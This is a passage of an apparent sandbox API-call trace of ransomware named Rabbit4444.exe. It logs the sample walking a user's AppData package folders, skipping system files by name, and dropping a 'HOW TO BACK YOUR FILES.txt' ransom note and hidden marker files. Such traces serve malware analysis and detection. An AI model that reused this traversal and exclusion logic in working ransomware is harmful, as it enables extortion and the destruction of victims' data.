BACK YOUR FILES.txt") returned -1 [0060.988] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.988] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0060.988] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0060.988] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0060.988] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0060.988] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0060.988] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0060.988] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0060.988] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0060.988] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0060.988] lstrcpyW (in: lpString1=0x130ebca, lpString2="AC" | out: lpString1="AC") returned="AC" [0060.988] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0060.988] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x98) returned 0x113558 [0060.988] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x122008 [0060.988] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf685c2d2, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd263aaf4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf685c2d2, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0060.988] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.988] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.988] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0060.988] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0060.988] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0060.988] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0060.988] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0060.988] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0060.988] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0060.988] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0060.988] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0060.988] lstrcpyW (in: lpString1=0x130ebca, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0060.988] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0060.988] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa2) returned 0x118b28 [0060.988] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x1222c8 [0060.988] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf67c392c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd263b30b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf67c392c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0060.989] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.989] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.989] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0060.989] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0060.989] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0060.989] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0060.989] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0060.989] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0060.989] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0060.989] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0060.989] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0060.989] lstrcpyW (in: lpString1=0x130ebca, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0060.989] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0060.989] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118658 [0060.989] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x122268 [0060.989] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf679d775, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd263bbc8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf679d775, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0060.989] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.989] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.989] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0060.989] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0060.989] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0060.989] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0060.989] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0060.989] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0060.989] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0060.989] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0060.989] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0060.989] lstrcpyW (in: lpString1=0x130ebca, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0060.989] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122320 [0060.989] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118de8 [0060.989] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122328 | out: ListHead=0xf68b0, ListEntry=0x122328) returned 0x122308 [0060.989] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf679d775, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd263c636, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf679d775, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0060.989] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.990] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.990] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0060.990] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0060.990] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0060.990] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0060.990] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0060.990] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0060.990] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0060.990] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0060.990] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0060.990] lstrcpyW (in: lpString1=0x130ebca, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0060.990] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0060.990] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x124478 [0060.990] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x122328 [0060.990] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf67c392c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713b1523, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x713b1523, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0060.990] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.990] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.990] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0060.990] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0060.990] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0060.990] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0060.990] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0060.990] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0060.990] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0060.990] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0060.990] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0060.990] lstrcpyW (in: lpString1=0x130ebca, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0060.990] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0060.990] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa4) returned 0x117e18 [0060.990] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x122368 [0060.990] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8efa262b, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x8efa262b, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x8efa262b, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0060.990] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.990] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.990] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0060.990] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0060.991] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0060.991] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0060.991] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0060.991] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0060.991] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0060.991] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0060.991] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0060.991] lstrcpyW (in: lpString1=0x130ebca, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0060.991] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0060.991] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x123d48 [0060.991] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x121fe8 [0060.991] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf679d775, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd26b6dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf679d775, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0060.991] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.991] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.991] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0060.991] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0060.991] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0060.991] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0060.991] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0060.991] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0060.991] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0060.991] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0060.991] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0060.991] lstrcpyW (in: lpString1=0x130ebca, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0060.991] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0060.991] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa6) returned 0x118bd8 [0060.991] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220a8 | out: ListHead=0xf68b0, ListEntry=0x1220a8) returned 0x121f88 [0060.991] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf679d775, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd26b6dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf679d775, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0060.991] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0060.991] lstrcpyW (in: lpString1=0x130ebca, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.991] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.051] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.051] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.052] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.052] CloseHandle (hObject=0x2a0) returned 1 [0061.052] CloseHandle (hObject=0x27c) returned 1 [0061.052] GetCurrentThreadId () returned 0xd98 [0061.052] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220a8 [0061.052] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState" [0061.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118bd8 | out: hHeap=0xe0000) returned 1 [0061.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0061.052] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState" [0061.052] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState\\" [0061.052] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" [0061.052] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.055] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.057] FlushFileBuffers (hFile=0x27c) returned 1 [0061.058] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.059] CloseHandle (hObject=0x27c) returned 1 [0061.059] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState") returned 82 [0061.059] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.059] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf679d775, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd26b6dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedb72c5f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0061.059] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.059] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.059] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.059] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.059] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf679d775, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd26b6dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedb72c5f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.059] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.060] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.060] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.060] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.060] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.060] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedb72c5f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedb72c5f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedb72c5f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.060] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.060] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.060] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedb72c5f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedb72c5f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedb72c5f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.060] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0061.060] lstrcpyW (in: lpString1=0x130ebde, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.060] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.060] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.060] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.061] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.061] CloseHandle (hObject=0x2a0) returned 1 [0061.061] CloseHandle (hObject=0x27c) returned 1 [0061.061] GetCurrentThreadId () returned 0xd98 [0061.061] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0061.061] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData" [0061.061] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123d48 | out: hHeap=0xe0000) returned 1 [0061.061] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0061.061] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData" [0061.061] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData\\" [0061.061] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0061.061] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.067] 